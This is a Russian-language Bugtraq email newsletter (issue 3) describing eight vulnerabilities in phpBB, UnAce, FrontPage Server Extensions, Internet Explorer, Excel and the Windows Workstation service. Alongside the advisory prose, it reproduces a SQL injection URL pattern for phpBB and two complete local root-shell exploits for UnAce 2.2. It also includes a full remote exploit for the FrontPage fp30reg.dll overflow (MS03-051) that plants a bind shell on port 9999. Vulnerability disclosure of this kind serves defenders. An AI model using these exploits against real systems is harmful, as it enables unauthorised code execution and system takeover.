Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Bugtraq - наиболее свежие и стоящие Вашего внимания Баги


Информационный Канал Subscribe.Ru


Приветствуем Вас!
Сегодня выходит в свет наш 3 выпуск рассылки посвященной Bugtraq'у
Этот номер богат на уязвимости и бреши в Internet Explorer'е,
что не может не огорчать истинных любителей этого браузера.
Те же кто пользуется другими веб юраузерами могут облегченно вздохнуть..
Но лишь до следующей рассылки... ибо в Нашем 4 выпуске будут освещены некоторые баги
такого распространенного просмотрщика как - Opera

Все выпуски этой рассылки будут выкладываться в разделе Публикации -> Bugtraq


Этот выпуск Вы сможете найти по этому адресу


1. phpBB Profile.PHP SQL Injection Vulnerability

phpBB – скрипт форума, написанный на языке программирования – Php. Скрипт распространяется в виде открытого для редактирования и просмотра кода. Написан для запуска на Unix и Linux вариантах операционных систем, также существуют версии для Microsoft Windows платформ.

Обнаружена возможность выполнять SQL запросы на системах с установленным скриптом форума – phpBB

Скрипт, в некоторых случаях, недостаточно полно проверяет вводимые пользователем данные, которые используются в дальнейшем для создания SQL запросов и выполнения их на уже созданных базах данных.

Уязвимость обнаружена в файле – profile.php. Атакующий может использовать подобную дыру для сооружения SQL запроса путем варьирования параметра $u, который указывается в адресной строке браузера.

Дальнейшее использование данной уязвимости может быть проведено для последующих атак на базы данных сервера.

Прошу учесть что этот баг был обнаружен в phpBB версии - 2.0.5, возможно что версия 2.0.6 также подвержена этой уязвимости.

Пример использования
http://www.example.com/profile.php?mode=viewprofile&u='[sqlcode]


2. Winace UnAce Command Line Argument Buffer Overflow Vulnerability

Winace – это утилита для сжатия/ архивации файлов, разработанная в оригинале для Microsoft Windows ОС. В дальнейшем она была переписана под Linux платформы и названа UnAce.

Было обнаружено, что данная программа подвержена ошибке переполнения буфера данных. Данная ситуация возникает тогда, когда UnAce оперирует с именами файлов, длиной более чем 610 байт вместе с расширением файла. В этом случае информация переполнит буфер и уничтожит любую сохраненную информацию, содержащуюся в переполненном буфере. Поскольку аргумент 'e' (через который происходит разархивирование файлов и в котором найден этот баг) является важным при работе программы, то в случае переполнения буфера атакующий может влиять на уровень выполнения команд в отведенной для программы памяти. В конечном счете это ведет к выполнению произвольных команд от имени машины на которой запущен UnAce.

Если же UnAce привязан к определенному типу файлов – к примеру – Internet браузеру, то по нажатии на специально сконструированное имя файла существует возможность выполнения любых инструкций на уязвимом хосте.

Пример использования
Листинг эксплоитов – первый:

/* gEEk-unace.c
*
* PoC exploit made for advisory based uppon an local stack based overflow.
* Vulnerable versions, maybe also prior versions:
*
* Unace v2.2
*
* Tested on: Debian 3.0
*
* Advisory source: MegaHz
* http://www.securityfocus.com/archive/1/344065/2003-11-07/2003-11-13/0
*
* -----------------------------------------
* coded by: demz (geekz.nl) (demz@geekz.nl)
* -----------------------------------------
*
*/

#include
#include

char shellcode[]=

"x31xc0" // xor eax, eax
"x31xdb" // xor ebx, ebx
"x31xc9" // xor ecx, ecx
"xb0x46" // mov al, 70
"xcdx80" // int 0x80

"x31xc0" // xor eax, eax
"x50" // push eax
"x68x6ex2fx73x68" // push long 0x68732f6e
"x68x2fx2fx62x69" // push long 0x69622f2f
"x89xe3" // mov ebx, esp
"x50" // push eax
"x53" // push ebx
"x89xe1" // mov ecx, esp
"x99" // cdq
"xb0x0b" // mov al, 11
"xcdx80" // int 0x80

"x31xc0" // xor eax, eax
"xb0x01" // mov al, 1
"xcdx80"; // int 0x80

int main()
{
unsigned long ret = 0xbfffc260;

char buffer[707];
int i=0;

memset(buffer, 0x90, sizeof(buffer));

for (0; i < strlen(shellcode) - 1;i++)
buffer[300 + i] = shellcode[i];

buffer[707] = (ret & 0x000000ff);
buffer[708] = (ret & 0x0000ff00) >> 8;
buffer[709] = (ret & 0x00ff0000) >> 16;
buffer[710] = (ret & 0xff000000) >> 24;
buffer[711] = 0x0;

printf("nUnace v2.2 local exploitn");
printf("---------------------------------------- demz @ geekz.nl --n");

execl("./unace", "unace", "e", buffer, NULL);
}



Второй эксплоит:

/*Local exploit for unace v2.2 by Li0n7
*Bug reported by Andreas Constantinides
*contact me: Li0n7@voila.fr
*visit us: ioc.fr.st
*tested on slackware 9.0
*usage: ./unace-exp[-r ][-b [-s ][-d ]]
*-r : try to exploit unace with specified as return address
*-b: enables bruteforcing
*-s: specify the first address to bruteforce
*-d: the value to take away from the starting address at each bruteforcing iteration
*/


#include
#include
#include
#include
#include
#include

#define BSIZE 600
#define SIZE BSIZE*2
#define D_DIFF 1
#define D_START 0xbfffffff
#define PATH "/tmp/test/exploits/src/unace"
#define RET 0xbffff73a

char shellcode[]=
"x31xc0x50x68//shx68/binx89xe3"
"x50x53x89xe1x99xb0x0bxcdx80";

char *buffer,*ptr;

void exec_culn();
int tease();
int make_string(long ret_addr);
int bruteforce(long start,int diff);
void banner(char *argv0);

int
main(int argc,char *argv[])
{
char * option_list = "bd:r:s:";
int option,brute = 0,opterr = 0,diff = D_DIFF;
long ret,start = D_START;

banner(argv[0]);
if (argc < 1) exit(-1);

while((option = getopt(argc,argv,option_list)) != -1)
switch(option)
{
case 'b':
brute = 1;
break;
case 'd':
diff = atoi(optarg);
break;
case 'r':
ret = strtoul(optarg,NULL,0);
make_string(ret);
tease();
exit(0);
break;
case 's':
start = strtoul(optarg,NULL,0);
break;
case '?':
fprintf(stderr,"[-] option '%c' invalidn",optopt);
banner(argv[0]);
exit(-1);
}

if(brute == 1)
bruteforce(start,diff);

return 0;
}

void
exec_vuln()
{
execl(PATH,PATH,"e",buffer,NULL);
}


int
tease()
{
pid_t pid;
pid_t wpid;
int status;

pid = fork();

if ( pid == -1 ) {
fprintf(stderr, " [-] %s: Failed to fork()n", strerror(errno));
exit(13);

} else if ( pid == 0 ) {

exec_vuln();

} else {

wpid = wait(&status);
if ( wpid == -1 ) {

fprintf(stderr,"[-] %s: wait()n", strerror(errno));
return 1;

} else if ( wpid != pid )

abort();

else {

if ( WIFEXITED(status) ) {

printf("[+] Exited: shell's ret code = %dn", WEXITSTATUS(status));
return WEXITSTATUS(status);
} else if ( WIFSIGNALED(status) ) {

return WTERMSIG(status);
} else {

fprintf(stderr, "[-] Stopped.n");

}
}
}
return 1;
}


int
make_string(long ret_addr)
{
int i;
long ret,addr,*addr_ptr;

buffer = (char *)malloc(SIZE);

if(!buffer)
{
fprintf(stderr,"[-] Can't allocate memory, exiting...n");
exit(-1);
}

ptr = buffer;

memset(ptr,0x90,BSIZE-strlen(shellcode));
ptr += BSIZE-strlen(shellcode);

for(i=0;i *ptr++ = shellcode[i];

addr_ptr = (long *)ptr;
for(i=0;i<100;i++)
*(addr_ptr++) = ret_addr;
ptr = (char *)addr_ptr;
*ptr = 0;

return 0;
}


int
bruteforce(long start,int diff)
{
int ret;
long i;

fprintf(stdout,"[+] Starting bruteforcing...n");

for(i=start;i<0;i=i-diff)

{ fprintf(stdout,"[+] Testing 0x%x...n",i);
make_string(i);
ret=tease();
if(ret==0)
{
fprintf(stdout,"[+] Ret address found: 0x%xn",i);
break;
}
}

return 0;
}

void
banner(char *argv0)
{
fprintf(stderr,"n local exploit for unace v <= 2.2 by Li0n7n");
fprintf(stderr," vulnerability reported by Andreas Constantinides
n");
fprintf(stderr," visit us: http://www.ioc.fr.stn");
fprintf(stderr," contact me: Li0n7[at]voila[dot]frn");
fprintf(stderr," usage: %s [-r ][-b [-s ][-d ]]nn",argv0);
}


3. Microsoft FrontPage Server Extensions Remote Debug Buffer Overrun Vulnerability

FrontPage Server Extensions – одна из компонент FrontPage, которая позволяет авторизованным пользователям изменять и редактировать информацию.

В состав FrontPage Server Extensions входит утилита для удаленной отладки, позволяющая пользователям соединяться с сервером и редактировать содержание с помощью программ: пример - Visual Interdev. Была найдена уязвимость превышения буфера при удаленном администрировании.

Обнаруженная уязвимость существует по причине отсутствия проверки на размер буфера в .dll файле (fp30reg.dll). Проблема инициируется при вызове HTTP POST запроса, сформированного и закодированного определенным образом. Дальнейшее использование этого бага позволит атакующему выполнить произвольный код на уязвимой системе с привилегиями локальной системы.

Пример эксплоита :

Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett Moore

Exploit by Adik < netmaniac [at] hotmail.kg >

Binds persistent command shell on port 9999
Tested on
Windows 2000 Professional SP3 English version
(fp30reg.dll ver 4.0.2.5526)



#include
#include
#include
#pragma comment(lib,"ws2_32")

#define VER "0.1"

/******** bind shellcode spawns persistent shell on port 9999
*****************************/
unsigned char kyrgyz_bind_code[] = {
0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE,
0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89,
0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78,
0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77,
0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03,
0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05,
0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98,
0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC,
0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77,
0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03,
0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8,
0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C,
0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0,
0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03,
0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B,
0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03,
0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48,
0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};

void cmdshell (int sock);
long gimmeip(char *hostname);

int main(int argc,char *argv[])
{
WSADATA wsaData;
struct sockaddr_in targetTCP;
struct hostent *host;
int sockTCP,s;
unsigned short port = 80;
long ip;
unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll
HTTP/1.1rn";
unsigned char packet[3000],data[1500];
unsigned char ecx[] = "xe0xf3xd4x67";
unsigned char edi[] = "xffxd0x90x90";
unsigned char call[] = "xe4xf3xd4x67";//overwrite .data section of fp30reg.dll
unsigned char shortjmp[] = "xebx10";

printf("n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-nn"
" by Adik < netmaniac [at] hotmail.KG >n http://netninja.to.kgnn", VER);
if(argc < 2)
{

printf(" Usage: %s [Target] n"
" eg: fp30reg.exe 192.168.63.130nn",argv[0]);
return 1;
}
if(argc==3)
port = atoi(argv[2]);

WSAStartup(0x0202, &wsaData);
printf("[*] Target:t%s tPort: %dnn",argv[1],port);
ip=gimmeip(argv[1]);
memset(&targetTCP, 0, sizeof(targetTCP));
memset(packet,0,sizeof(packet));
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(port);
sprintf(packet,"%sHost: %srnTransfer-Encoding:
chunkedrn",header,argv[1]);
memset(data, 0x90, sizeof(data)-1);
data[sizeof(data)-1] = 'x0';
memcpy(&data[16],edi,sizeof(edi)-1);
memcpy(&data[20],ecx,sizeof(ecx)-1);
memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);
memcpy(&data[250+14],call,sizeof(call)-1);
memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
sprintf(packet,"%sContent-Length: %drnrn%xrn%srn0rnrn",packet,strlen(data),strlen(data),data);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)

{ printf("[x] Socket not initialized! Exiting...n");
WSACleanup();
return 1;
}
printf("[*] Socket initialized...n");

if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("[*] Connection to host failed! Exiting...n");
WSACleanup();
exit(1);
}
printf("[*] Checking for presence of fp30reg.dll...");
if (send(sockTCP, packet, strlen(packet),0) == -1)
{
printf("[x] Failed to inject packet!
Exiting...n");
WSACleanup();
return 1;
}
memset(packet,0,sizeof(packet));
if (recv(sockTCP, packet, sizeof(packet),0) == -1)
{
printf("[x] Failed to receive packet! Exiting...n");
WSACleanup(); return 1;
}
if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')
printf(" Found!n");
else
{
printf(" Not Found!! Exiting...n");
WSACleanup();
return 1;
}
printf("[*] Packet injected!n");
closesocket(sockTCP);
printf("[*] Sleeping ");
for(s=0;s<13000;s+=1000)
{
printf(". ");
Sleep(1000);
}
printf("n[*] Connecting to host: %s on port 9999",argv[1]);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("n[x] Socket not initialized! Exiting...n");
WSACleanup(); return 1;
}
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(9999);
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("n[x] Exploit failed or there is a Firewall! Exiting...n");
WSACleanup();
exit(1);
}
printf("n[*] Dropping to shell...nn");
cmdshell(sockTCP);
return 0;
}
/*********************************************************************************/
void cmdshell (int sock)
{
struct timeval tv;
int length;
unsigned long o[2];
char buffer[1000];

tv.tv_sec = 1;
tv.tv_usec = 0;

while (1)
{
o[0] = 1;
o[1] = sock;

length = select (0, (fd_set *)&o, NULL, NULL, &tv);
if(length == 1)
{
length = recv (sock, buffer, sizeof (buffer), 0);
if (length <= 0)
{
printf ("[x] Connection closed.n");
WSACleanup();
return;
}
length = write (1, buffer, length);
if (length <= 0)
{
printf ("[x] Connection closed.n");
WSACleanup();
return;
}
}
else
{
length = read (0, buffer, sizeof (buffer));
if (length <= 0)
{
printf("[x] Connection closed.n");
WSACleanup();
return;
}
length = send(sock, buffer, length, 0);
if (length <= 0)
{
printf("[x] Connection closed.n");
WSACleanup();
return;
}
}
}

}
/*********************************************************************************/
long gimmeip(char *hostname)
{
struct hostent *he;
long ipaddr;

if ((ipaddr = inet_addr(hostname)) < 0)
{
if ((he = gethostbyname(hostname)) == NULL)
{
printf("[x] Failed to resolve host: %s! Exiting...nn",hostname);
WSACleanup();
exit(1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}


4. Microsoft FrontPage Server Extensions SmartHTML Interpreter Vulnerability

FrontPage Server Extensions – одна из компонент FrontPage, которая позволяет авторизованным пользователям изменять и редактировать информацию.

FrontPage Server Extensions содержит SmartHTML interpreter – переводчик, который позволяет получить доступ к различным функциям FrontPage’а. В этом программном обеспечении найдена ошибка, приводящая к DoS атаке (Denial of Service – отказ в обслуживании). Необходимо только сформировать и отослать некорректный запрос, чтобы зациклить SmartHTML переводчик. Этот процесс через некоторое время займет все доступные CPU ресурсы. По этому примеру, возможно исчерпать все свободные системные ресурсы с помощью DoS атаки.

5. Microsoft Internet Explorer DHTML Drag and Drop Local File Vulnerability

Компания Microsoft объявила о нахождении в Internet Explorer’е уязвимость в случаях обработки специфичных DHTML событий. Заявлено, что подобный баг является причиной некорректной обработки Drag and Drop событий (Drag and Drop – перенести и оставить (сохранить) – метод обработки информации посредством окон Windows и других приложений, позволяет непосредственно визуально перемещать информацию и в последствии сохранять). Согласно информации известно, что существует возможность сохранения произвольного кода на локальной машине. В этом случае подтверждения пользователя на сохранение информации не требуется, те любая информация сохраняется без всяких на то прав.

Успешное использование этой уязвимости позволит атакующему запустить процесс выполнения произвольного кода с привилегиями пользователя локальной машины. Также, как вариант, рассматривается возможность помещения исполняемого кода в системную область автозагрузки (директорию) или же другие важные директории компьютера.

Microsoft установила, что сохранение исполняемого кода в определенных директориях может инициировать немедленное выполнение кода программы, указанного в сохраненном файле.

Эта уязвимость может быть использована с помощью составления специальным образом html страницы или же посредством почты содержащей HTML теги. Другие приложения, использующие движок Internet Explorer (такие как – Outlook, MSN Messenger и другие), также подвержены подобной ошибке.


6. Microsoft Excel XLM Macro Security Level Bypass Vulnerability

Microsoft Excel – в своем составе содержит систему защиты документов от макросов (макрос – скрипт, написанный на VBS – Visual Basic Script, который запускается при каждом открытии документа, содержащего его в своем составе). Эта защита сканирует открываемый документ на наличие в нем вложенных макросов. Затем, в зависимости от установок защиты локального компьютера, у пользователя запрашивается разрешать ли запуск подобных скриптов на машине. При определенном конфигурировании системы безопасности компьютера возможен автоматический запуск макросов.

Уязвимость, обнаруженная в MS Excel, позволяет атакующему выполнить XLM [Excel 4] макрос не смотря на установки безопасности системы. Подобная ошибка найдена по причине некорректной проверки документа, содержащего специально созданную крупноформатную таблицу, на наличие вложенных макросов. В результате, код указанный в таблице будет выполнен при открытии Excel документа. При этом предупреждение о нахождении в документе макросов не будет выведено пользователю не смотря на установки безопасности системы. Следует заметить, что выполнение макроса будет происходить под правами пользователя, запустившего уязвимую версию MS Excel, что потенциально позволяет атакующему выполнять произвольный код с привилегией администратора системы.


7. Microsoft Windows Workstation Service Remote Buffer Overflow Vulnerability

Уязвимость, найденная в Microsoft Windows Workstation, позволяет атакующему получить неавторизованный доступ к хосту.

Проблематичным является файл – WKSSVC.DLL, который обрабатывает запросы, с помощью которых можно получить доступ к удаленно расположенной пользовательской машине, в дальнейшем такие запросы будут называться – RPC (Remote Procedure Call – удаленный вызов процедуры). Эти запросы обрабатываются и отсылаются посредством TCP и UDP портов, таких как – 138, 139 и 445.

По причине того, что Windows не жестко лимитирует входящие данные при удаленном коннекте, существует возможность перезаписать важную информацию, находящуюся в системной памяти. В частности недостаточна проверка при сетевом администрировании, которая обеспечивается DCE/RPC сервисом. Некоторые из подобных событий генерируют логфайл (logfile – файл, содержащий информацию о времени подключения, процессах, запущенных пользователем и подобную информацию) в 'Debug' директории установленной операционной системы – Microsoft Windows. Когда логфайл создан, то при вызове процедуры 'vsprintf' через файл WKSSVC.DLL не проверяются размеры вводимой информации. Поэтому, при сооружении чрезмерно длинной строки и последующей отсылке его RPC функции, возможно переполнение буфера данных.

Уязвимость может быть использована для выполнения кода с привилегией самого Windows сервиса, те - почти всегда права являются системными.


8. Microsoft Internet Explorer XML Object Zone Restriction Bypass Vulnerability

Компания Microsoft объявила об уязвимости Internet Exporer’а при оперировании с XML объектами. В подтверждение к вышесказанному были протестированы такие версии продукта, как 5.5 и 6.0

Причина подобного бага заключается в том, что IE (Internet Explorer) не в состоянии проверить путь нахождения XML объекта, что делает возможным получения доступа к файлам, находящимся вне разрешенной зоны локального компьютера. Это позволит атакующему просматривать содержимое файловой системы, вне зависимости от нахождения объекта (в сетевом или локальном окружении).

Следует заметить, что когда “жертва” посещает веб сайт, содержащий подобного рода XML объекты, система запрашивает разрешение на закачку HTML файла. Только по завершению этого процесса возможно успешное дальнейшее развитие атаки на хост.

Эта уязвимость может быть использована с помощью составления специальным образом html страницы или же посредством почты содержащей HTML теги. Другие приложения, использующие движок Internet Explorer (такие как – Outlook, MSN Messenger и другие), также подвержены подобной ошибке.

****

Информационная поддержка рассылки -
:: Novorossiysk >> OnLine ::
www.novonline.ru

http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное